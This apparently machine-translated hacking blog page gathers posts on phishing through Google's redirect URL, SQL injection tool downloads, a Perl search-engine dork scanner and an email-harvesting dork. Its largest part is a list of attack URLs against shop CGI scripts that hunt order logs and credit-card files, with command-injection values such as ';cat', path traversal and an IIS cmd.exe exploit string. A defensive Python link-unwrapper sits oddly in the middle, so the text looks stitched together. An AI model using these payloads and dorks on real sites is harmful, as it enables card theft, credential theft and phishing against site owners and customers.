Showing posts with the label haking.
Monday, 28 May 2012
Monday, 7 March 2011
Phishing attack using Google redirection.
Google's link redirection can be used for phishing attacks, and doing so is very simple.
It is as simple as this:
http://www.google.com/url?q= + YOUR LINK
e.g.:
http://www.google.com/url?q=http://blog.inurl.com.br
With this combination you are sent to a page that shows a link named after your page, with the following sentence:
The page you were on is trying to send you to http://blog.inurl.com.br.
Copying the link inside the tag http://blog.inurl.com.br, we get access to
Done, that is your redirect link.
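From the receiving side, a mail or proxy filter can undo this wrapper before judging a link. The following is an added example, not part of the original post: it peels google.com/url wrappers (including nested ones) and reports the real destination. The function names, the trusted-host list and the sample links are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Hosts treated as Google redirect wrappers. Assumption for this example:
# only the hosts below; extend the set for country domains you expect to see.
GOOGLE_REDIRECT_HOSTS = {"google.com", "www.google.com"}
# Query parameters that carry the destination ("q" is the one used in the post).
DESTINATION_PARAMS = ("q", "url")


def redirect_target(url):
    """Return the wrapped destination if url is a Google /url redirect, else None."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme not in ("http", "https"):
        return None
    if host not in GOOGLE_REDIRECT_HOSTS or parts.path != "/url":
        return None
    params = parse_qs(parts.query)  # also percent-decodes the values
    for key in DESTINATION_PARAMS:
        values = params.get(key)
        if values:
            return values[0]
    return None


def unwrap(url, max_depth=5):
    """Peel nested wrappers. Returns (final_url, number_of_wrappers_removed)."""
    current, hops = url, 0
    while hops < max_depth:
        target = redirect_target(current)
        if target is None:
            break
        current, hops = target, hops + 1
    return current, hops


def assess_link(url, trusted_hosts):
    """Classify a link by where it really leads, not by the host it displays."""
    final_url, hops = unwrap(url)
    host = (urlsplit(final_url).hostname or "").lower()
    trusted = host in trusted_hosts or any(
        host.endswith("." + t) for t in trusted_hosts
    )
    if hops == 0:
        verdict = "direct"
    elif redirect_target(final_url) is not None:
        verdict = "redirect-too-deep"      # still wrapped after max_depth hops
    elif trusted:
        verdict = "redirect-to-trusted"
    else:
        verdict = "redirect-to-untrusted"  # candidate for blocking or rewriting
    return {"final_url": final_url, "final_host": host,
            "hops": hops, "verdict": verdict}


if __name__ == "__main__":
    # Constructed sample links, as they might appear in a message body.
    samples = [
        "http://www.google.com/url?q=http://blog.inurl.com.br",
        "https://www.google.com/url?sa=t&url=https%3A%2F%2Fdocs.example.com%2Fguide",
        "http://www.google.com/url?q=http%3A%2F%2Fwww.google.com%2Furl%3Fq%3D"
        "http%253A%252F%252Fexample.test%252Flogin",
        "https://example.com/direct",
    ]
    for link in samples:
        print(assess_link(link, trusted_hosts={"example.com"}))
```

A filter would display or log `final_host` in place of the wrapper host, so the reader sees the destination rather than `www.google.com`.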
Sunday, 6 March 2011
SQL injector program, 10 years of RED EYE CREW.
A great SQL injector, a Brazilian Havij.
SQL INJECTION FREE for the whole RED EYE community.
10 years of RED EYE CREW.
Version 0.1 Beta
MD5: FF303B4F4902DD5A8AFE7DC911C7CB09
Source: http://redeyecrew.wordpress.com/2011/01/12/sql-injection-free/
Download: http://www.multiupload.com/J7EQ3IHW6L
Dork scanner in Perl
It can be used on both Windows and Linux.
To use it on Windows, download ActivePerl, and use simple dorks for your scan.
Dork source: http://forum.guiadohacker.com.br
Author: PS1C0
DORK SCANNER
#!/usr/bin/perl
use LWP::UserAgent;

# Read the search query (dork) from standard input.
print "Specify dork: ";
$dork = <STDIN>;
chomp($dork);

# Placeholder: the marker string searched for in each result page was lost
# when this page was extracted. The offset of 13 used below is its length.
$marker = '...';

# Request the Bing result pages, 10 results per page.
for ($i = 0; $i < 1000; $i += 10) {
    $b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
    $b->timeout(30);
    $b->env_proxy;
    $c = $b->get('http://www.bing.com/search?q=' . $dork . '&first=' . $i . '&FORM=PERE')->content;
    $check = index($c, 'sb_pagN');
    # Print every quoted value that follows the marker on this page.
    while (1) {
        $n = index($c, $marker);
        if ($n == -1) {
            last;
        }
        $c = substr($c, $n + 13);
        $s = substr($c, 0, index($c, '"'));
        print $s, "\n";
    }
    # Stop when the page no longer contains 'sb_pagN'.
    if ($check == -1) {
        last;
    }
}
Extracting emails with Google
A simple dork for those who like to extract mailing lists from sites; this simple dork will be a great help.
Many of the links reached come with names, dates and passwords, like a database,
so I provide a tool for extracting the emails from them.
ONLINE EMAIL EXTRACTOR.
Link: http://www.googlebig.com/sections/Email-Extractor/
Search code: +mail +@ +yahoo +hotmail +gmail ext:txt
Saturday, 26 February 2011
Netsparker: a web security scanner free of false positives
Netsparker is a web application security scanner that, according to its developers, is completely free of false positives. According to them, Netsparker has a new technology that can confirm vulnerabilities on demand, which is why it is immune to false positives.
For example, when Netsparker identifies a SQL injection, it can work out how to exploit the flaw automatically and extract the application's version. When this data has been extracted successfully, the program reports that the flaw has been confirmed.
Netsparker can simulate a real attacker with great success. It can therefore attack sites that use AJAX and JavaScript.
Although Netsparker is a paid product, there is a "Community" version that shares many of the features of the paid version. It is able to detect SQL injection and XSS (cross-site scripting).
Unfortunately, Netsparker does not run on Linux. It supports Windows XP (SP2 or later), Windows 7, Windows Vista (SP1 or later), Windows Server 2003 (SP1 or later) and Windows Server 2008, and requires Internet Explorer and .NET Framework 3.5 SP1 on the machine.
Download: http://www.mavitunasecurity.com/communityedition/
STRING BANK
SQL ERROR string bank
A set of strings that expose SQL errors on certain sites.
NOTE: GOOD FOR SQL INJECTION.
MUSIC search string bank
A set of strings that expose directories / folders containing media files.
A set of strings that expose directories / folders containing password files or editing privileges.
CAMERAS & WEBCAM search string bank
A set of strings that expose surveillance cameras and webcams.
Assorted dorks
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/webcart-lite/orders/import.txt
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
/_private/orders.htm
/orders/mountain.cfg
/PDG_Cart/shopper.config
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp&Board=6210&Idle=10&Sort=0&Order=Des cend&Page=0&Session=;;;
/_private/shopping_cart.mdb
/cgi-bin/shopper.cgi
/cgi-bin/shop.cgi
/cgi-bin/perlshop.cgi
/cgi-bin/mall2000.cgi
/log/
/logfile/
/logfiles/
/logger/
/logging/
/logs/
/logs/access_log
/weblog/
/weblogs/
/cgi-bin/loadpage.cgi
/database/
/databases/
/cgi-bin/Web_Store/web_store.cgi
/scripts/cart32.exe
/scripts/c32web.exe
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&templa te=order.log
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template= order.log
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;c at%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/ccbill/secure/ccbill.log
/cgibin/shopper.cgi?search=action&keywords=moron&template= order.csv
/order13.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&templa te=order.log
/orders/db/zzzbizorders.log.html
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&templ ate=other
isinglogorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=o rder.log
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/cart32/CART32-order.txt
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/cgi-bin/cart32.ini
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/cart32.exe/error
/metacart/database/metacart.mdb
//shopping/database/metacart.mdb
/shopping/database/metacart.mdb
/fpdb/shop.mdb
/cgi-bin/shopper.cgi?keywords=usstick&search=action&templat e=order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=order. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sales. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sell.l og
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin_ files.log
/cgi-bin/shopper.cgi?keywords=usstick&search=action&templat e=order.log
/cgi-bin/shopper.cgi?keywords=psiber&search=action&template =order.log
/cgi-bin/shopper.cgi?keywords=9461&search=action&template=o rder.log
/cgi-bin/shopper.cgi?keywords=SC7021&search=action&template =order.log
/cgi-bin/shopper.cgi?keywords=cc&search=action&template=ord er.log
/cgi-bin/shopper.cgi?keywords=order&search=action&template= order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=moron%20&templa te=shopper.conf
/Merchant2/modules/log/elf.mv?search=action&ORDERLOG.txt
/Merchant2/modules/log/malf.mv?search=action&ORDERLOG.txt
/cgi-bin/shopper.exe?search=action&keywords=CD006&template= sales.log
/cgi-bin/shopper.exe?search=action&keywords=***&template=se ll.log
/cgi-bin/shopper.exe?search=action&keywords=order&template= admin.log
/cgi-bin/shopper.exe?search=action&keywords=cc&template=adm in_files.log
/cgi-bin/shopper.exe?search=action&keywords=hack&template=o rder.log
/cgi-bin/shopper.exe?search=action&keywords=9400&template=o rder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/worlddirect/Web_store/Admin_files/order.log
/website/
/WebShop/templates/cc.txt
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/logs/
/WebShop/
/WebCart/orders.txt
/webcart/
/Web_store/Admin_files/order.log
/STORE/orders.txt
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/PSUser/PSCOErrPage.htm
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/PDG/order.txt
/orders/results
/Orders/orders.txt
/orders/order.log
/orders/mountain.cf
/orders/import.txt
/orders/import.txt
/orders/checks.txt
/orders/
/orders.txt
/orders.htm
/orderform/orders.txt
/order.txt
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper.exe?search=action&keywords=%20&template=sh opper.conf
/cgi-bin/shopper.exe
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/perlshop.cgi
/cgi-bin/PDG_Cart/cc.log
/cgi-bin/orders/mc.txt
/cgi-bin/orders/cc.txt
/cgi-bin/orders.txt
/cgi-bin/orderlog.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtm
/cgi-bin/ezmall2000/mall_log_files/order.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/cart32/CART32-order.txt
/cgi-bin/cart.pl
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/admin/Orders/orders.txt
Friday, 25 February 2011
SCANNER SQLI ONLINE - GOOGLE INURL BRASIL
The Google INURL Brasil SQLi scanner uses simple dorks, gives immediate results, carries no virus risk, and is 100% free.
Misuse is the user's responsibility; all content is for study purposes.
Sunday, 20 February 2011
Dork hacking to search for c99
For the smart guys who love a c99 with safe mode off, here goes a small list of dorks.
PHP SCRIPT: Security-Shell RFI Scanner v1.0
Security-Shell RFI Scanner v1.0 is an RFI scanner for all of you who are always scanning.
<?php
/***************************************************************************
* PHP Security-Shell RFI Scanner v1.0 *
* *
* Copyright (C) 2007 by pentest *
* *
* http://security-sh3ll.com *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
***************************************************************************/

/* Regexes that match include/require statements whose argument starts with a variable */
$escan_inc_regex = array( '/include(_once)?.\$/ix', '/require(_once)?.\$/ix' );
/* Regexes used to extract the variable name from the matched statement */
$escan_var_regex = array( '/\Ainclude(_once)?./is', '/\Arequire(_once)?./is' );
/* File extensions to scan */
$escan_valid_ext = array( 'php' );
/* Maximum size of a file to scan; 0 scans every file */
$escan_max_size = 0;
/* Number of directories crawled */
$escan_dir_count = 0;
/* Number of files scanned */
$escan_file_count = 0;
/* Number of potential RFI findings */
$escan_match_count = 0;
/* Total number of bytes scanned */
$escan_byte_count = 0;

escan_banner();
if( $argc < 2 ){
    escan_usage($argv[0]);
}
else{
    $stime = escan_get_mtime();
    escan_recurse_dir( realpath($argv[1]).DIRECTORY_SEPARATOR );
    $etime = escan_get_mtime();
    print "\n@ Scan report : \n\n" .
        "\t$escan_dir_count directory .\n".
        "\t$escan_file_count file .\n".
        "\t" . escan_format_size($escan_byte_count) . " .\n".
        "\t$escan_match_count Potential RFI .\n".
        "\t".($etime-$stime) . " Second Processing .\n\n";
}

/* Formats a size given in bytes as a human-readable string */
function escan_format_size($bytes)
{
    if( $bytes < 1024 ) return "$bytes bytes";
    if( $bytes < 1048576 ) return ($bytes / 1024) . " Kb";
    if( $bytes < 1073741824 ) return ($bytes / 1048576) . " Mb";
    return ($bytes / 1073741824) . " Gb";
}

/* Returns the current timestamp in seconds, with microseconds */
function escan_get_mtime()
{
    list($usec, $sec) = explode(" ",microtime());
    return ((float)$usec + (float)$sec);
}

/* Extracts the include/require statement that starts at $offset */
function escan_scan_line($content,$offset)
{
    /* Limit to 2 parts so a statement with no trailing ';' still yields one element */
    $parts = explode( ";" , substr($content,$offset), 2 );
    return $parts[0].";";
}

/* Extracts the variable name from an include/require statement */
function escan_parse_var( $line, $regex_id )
{
    global $escan_var_regex;
    $vars = preg_split($escan_var_regex[$regex_id],$line);
    $varname = isset($vars[1]) ? $vars[1] : "";
    $delimiters = " .);";
    for( $i = 0; $i < strlen($varname); $i++ ){
        for( $j = 0; $j < strlen($delimiters); $j++ ){
            if($varname[$i] == $delimiters[$j]){
                return substr( $varname, 0, $i );
            }
        }
    }
    return $varname;
}

/* Checks whether the variable $var is assigned in $content before position $offset */
function escan_check_definitions($content,$offset,$var)
{
    /* Object properties are treated as defined */
    if( strpos( $var, "->" ) ){
        return 1;
    }
    $chunk = substr($content,0,$offset);
    $regex = "/".preg_quote($var,"/")."\s*=/ix";
    preg_match( $regex, $chunk,$matches );
    return count($matches);
}

/* Scans $file for includes of variables that are never assigned (potential RFI) */
function escan_parse_file($file)
{
    global $escan_inc_regex;
    global $escan_max_size;
    global $escan_file_count;
    global $escan_match_count;
    global $escan_byte_count;
    $fsize = filesize($file);
    if( $escan_max_size && $fsize > $escan_max_size ) return;
    $escan_file_count++;
    $escan_byte_count += $fsize;
    $content = @file_get_contents($file);
    /* Skip files that cannot be read */
    if( $content === false ) return;
    for( $i = 0; $i < count($escan_inc_regex); $i++ ){
        if( preg_match_all( $escan_inc_regex[$i], $content, $matches, PREG_OFFSET_CAPTURE ) ){
            $nmatch = count($matches[0]);
            for( $j = 0; $j < $nmatch; $j++ ){
                $offset = $matches[0][$j][1];
                $line = escan_scan_line($content,$offset);
                $var = escan_parse_var($line,$i);
                if( escan_check_definitions($content,$offset,$var) == 0 )
                {
                    $escan_match_count++;
                    print "@ $file - \n\t- '$var' The position $offset .\n";
                }
            }
        }
    }
}

/* Returns the extension of the file $fname */
function escan_get_file_ext($fname)
{
    if( strchr($fname,'.') ){
        return substr($fname,strrpos($fname,'.')+1);
    }
    else{
        return "";
    }
}

/* Checks whether the file $fname has an extension that should be scanned */
function escan_isvalid_ext($fname)
{
    global $escan_valid_ext;
    for( $i = 0; $i < count($escan_valid_ext); $i++ ){
        if(strstr(escan_get_file_ext($fname),$escan_valid_ext[$i])){
            return true;
        }
    }
    return false;
}

/* Scans directories recursively */
function escan_recurse_dir($dir)
{
    global $escan_dir_count;
    $escan_dir_count++;
    if( $cdir = @dir($dir) ){
        /* Compare against false so an entry named "0" does not end the loop */
        while( false !== ($entry = $cdir->read()) ){
            if( $entry != '.' && $entry != '..' ){
                if( is_dir($dir.$entry) ){
                    escan_recurse_dir($dir.$entry.DIRECTORY_SEPARATOR);
                }
                else{
                    if( escan_isvalid_ext($dir.$entry) ){
                        escan_parse_file($dir.$entry);
                    }
                }
            }
        }
        $cdir->close();
    }
}

function escan_banner()
{
    print "*-----------------------------------------------------*\n" .
        "* PHP Security-Shell RFI Scanner v1.0 by pentest *\n" .
        "* *\n" .
        "* http://security-sh3ll.com *\n" .
        "*-----------------------------------------------------*\n\n";
}

/* Prints usage; the script takes the directory to scan as its first argument */
function escan_usage($pname)
{
    print "Use : php $pname <directory>\n";
}